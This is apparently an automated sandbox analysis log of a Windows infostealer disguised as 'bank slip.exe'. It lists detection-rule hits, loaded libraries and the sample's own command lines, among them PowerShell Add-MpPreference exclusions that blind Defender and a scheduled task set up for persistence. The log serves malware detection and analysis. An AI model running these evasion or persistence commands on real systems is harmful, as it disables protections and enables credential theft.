Source: bank slip.exe, 00000000.00000002.2076413089.0000000009869000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNjBW.exe( vs bank slip.exe
Source: bank slip.exe | Binary or memory string: OriginalFilenameNjBW.exe( vs bank slip.exe
Source: bank slip.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.bank slip.exe.389c998.7.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.mKSjGvfmIulVB.exe.4318670.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.bank slip.exe.38d7bb8.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.mKSjGvfmIulVB.exe.4318670.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.bank slip.exe.389c998.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: bank slip.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mKSjGvfmIulVB.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.bank slip.exe.5140000.8.raw.unpack, -.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.bank slip.exe.5140000.8.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.bank slip.exe.5140000.8.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.bank slip.exe.389c998.7.raw.unpack, 9O2OLI.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.bank slip.exe.389c998.7.raw.unpack, hdYUG.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.bank slip.exe.389c998.7.raw.unpack, LGBZ4N2f.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.bank slip.exe.389c998.7.raw.unpack, F8OmG.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.bank slip.exe.389c998.7.raw.unpack, Bgo.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, sfsXZwXfvR3dieCKhH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RYNQdoLFBlDdX1Oj8U.cs | Security API names: _0020.SetAccessControl
Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RYNQdoLFBlDdX1Oj8U.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RYNQdoLFBlDdX1Oj8U.cs | Security API names: _0020.AddAccessRule
Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, sfsXZwXfvR3dieCKhH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RYNQdoLFBlDdX1Oj8U.cs | Security API names: _0020.SetAccessControl
Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RYNQdoLFBlDdX1Oj8U.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RYNQdoLFBlDdX1Oj8U.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/19@1/1
Source: C:\Users\user\Desktop\bank slip.exe | File created: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4832:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Mutant created: \Sessions\1\BaseNamedObjects\EdtZvPE
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Users\user\Desktop\bank slip.exe | File created: C:\Users\user\AppData\Local\Temp\tmp2859.tmp
Source: bank slip.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bank slip.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\bank slip.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\bank slip.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: bank slip.exe | ReversingLabs: Detection: 23%
Source: bank slip.exe | Virustotal: Detection: 33%
Source: C:\Users\user\Desktop\bank slip.exe | File read: C:\Users\user\Desktop\bank slip.exe
Source: unknown | Process created: C:\Users\user\Desktop\bank slip.exe "C:\Users\user\Desktop\bank slip.exe"
Source: C:\Users\user\Desktop\bank slip.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\bank slip.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\bank slip.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\bank slip.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\bank slip.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe"
Source: C:\Users\user\Desktop\bank slip.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe"
Source: C:\Users\user\Desktop\bank slip.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp"
Source: C:\Users\user\Desktop\bank slip.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp"
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\bank slip.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: dwrite.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: windowscodecs.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: slc.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: sppc.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\bank slip.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\bank slip.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                        Source: bank slip.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: bank slip.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: bank slip.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: NjBW.pdb source: bank slip.exe, mKSjGvfmIulVB.exe.0.dr
                        Source: Binary string: RegSvcs.pdb, source: GUIVTme.exe, 0000000F.00000000.2169045059.0000000000EC2000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr
                        Source: Binary string: NjBW.pdbSHA256 source: bank slip.exe, mKSjGvfmIulVB.exe.0.dr
